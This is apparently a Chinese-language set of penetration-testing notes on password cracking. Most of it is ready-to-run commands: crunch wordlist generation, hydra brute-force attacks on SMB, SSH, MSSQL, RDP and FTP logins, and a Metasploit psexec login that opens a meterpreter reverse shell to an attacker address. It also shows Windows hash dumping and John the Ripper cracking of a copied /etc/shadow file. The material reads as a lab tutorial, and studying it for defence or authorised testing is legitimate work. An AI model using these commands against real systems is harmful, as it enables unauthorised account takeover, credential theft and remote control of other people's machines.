口令破解
明文传输
HTTP、FTP、Telnet等传输的数据流都是明文,包括口令认证信息
离线破解:密文还原---明文
1、暴力破解
密码生成工具 crunch (kali自带) crunch 1 8 1234567890abcdefghijklmnopqrstuvwxyz cupp 需要安装 apt-get install cupp
2、crunch命令格式
crunch <min-len> <max-len> [<charset string>] [options] min-len设定密码的最小长度 max-len设定密码的最大长度 charset string字符集 -b指定文件输出的大小,避免字典文件过大 -c指定文件输出的行数,记包含密码的个数 -d限制相同元素出现的次数 -e定义停止字符,即到该字符串就停止生成 -f调用库文件(/usr/share/crunch/charset.lst) -i改变输出格式,即aaa,aab -> aaa,baa -o将密码保存到指定文件 -q读取密码文件,即读取pass.txt -r定义重复一个字符串就重新开始 -s指定一个开始的字符 -t指定密码输出的格式 -u禁止打印百分比 -z压缩生成的字典文件,支持gzip,bzip2,lzma,7z -l生成特殊字符 -p指定生成元素 特殊字符 %代表数字 ^代表特殊符号 @代表小写字母 ,代表大写字母 生成1-8位密码字典,字符集合位小写字母,从a 开始到zzzzzzzz结束 crunch 1 8 生成1-6位的密码字典,字符集合位[abcdefg],从a 开始到gggggg结束 crunch 1 6 abcdefg 生成3 位密码字典,字符集合[ab ],从a 开始到 [ ] 生成指定字符串,比如生日的日期 crunch 8 8 -t 199307%% -e 19930731 生成元素的组合,比如123.com crunch 7 7 -t %%%.com -s 111.com -e 123.com 在字典中输出特殊字符 crunch 3 3 abc -t @@@ -l @aa 以元素组合生成字典 zhangsan|1993|0701 CRUNCH 4 4 -P AJEST 1992 0701 保存字典文件 crunch 11 11 -t 1700010%%%% -b 20mb -o START 自定义字符集合 将自带字典进行备份 创建自定义字符集合[*.com] 字典文件 crunch 5 5 -f charset.lst test -t @.com
3、windows口令破解
在kali下使用hydra -l 指定一个用户名 -p指定一个密码 -P指定密码字典 -L 指定用户名字典 -vV显示爆破细节 -o保存爆破结果 -f找到正确密码就停止爆破 -e n(null)、s(same)、r(反向) -e nsr -t 线程 hydra -l admin -P ../dic/pwd.dic 192.168.131.128 smb -vV -f -e nsr 破解密码后使用msfconsole进行连接 use exploit/windows/smb/psexec_psh set payload windows/meterpreter/reverse_tcp show options set rhsot 192.168.131.128 set SMBUSER admin set SMBPASS 123456 set lhsot 172.16.13.42 exploit windows账户hash值破解 除了可以远程爆破windows密码,我们还可以从本地破解windows密码。 本地Windows 账户破解主要有两种方式 从内存中读取windows 密码 我们可以用getpass 直接从Windows 系统内存中读取用户数据 Windows hash 值破解 Windows hash 值破解一共有两步操作。 首先我们使用QuarkPwDump 工具读取(导出)Windows 账户密码hash 值, -t指定使用工具 -o结果导出到 [C:UsersAdministratorDesktopQuarksPwDump.exe -dhl -t JOHN -o win2008.hash] 然后在使用 john 工具破解 cd /~/.john john win2008.hash --format=NT --wordlist=/root/dic/winPass.dic [john --show win2k8.hash --format=NT]
4、linux口令破解
linux 口令破解 linux 口令破解,也分远程破解和和本地破解。 远程破解主要是爆破ssh 服务,属于在线密码攻击。 本地破解需要拿到linux 的shadow 文件,进行hash 值破解,属于离线密码攻击 破解ssh 服务 我们使用hydra 攻击破解ssh 服务,hydra 攻击已经自动集成在kali 虚拟机中。 命令如下: hydra -L /root/dic/user.dic -P /root/dic/winPass.dic 127.0.0.1 ssh -e nsr -vV -o 127.ssh 离线破解linux密码(在kali下) cd /~/.john cp /etc/shadow ./shadow john shadow 查看john --show shadow
5、服务口令破解
破解MSSQL 口令 hydra -l sa -P /root/dic/test_pwd.dic 192.168.1.150 mssql -vV 破解RDP 口令 hydra -l administrator -P /root/dic/test_pwd.dic 192.168.1.150 rdp -vV 破解FTP 口令 hydra -L /root/dic/test_user.dic -P /root/dic/test_pwd.dic 192.168.1.150 ftp -vV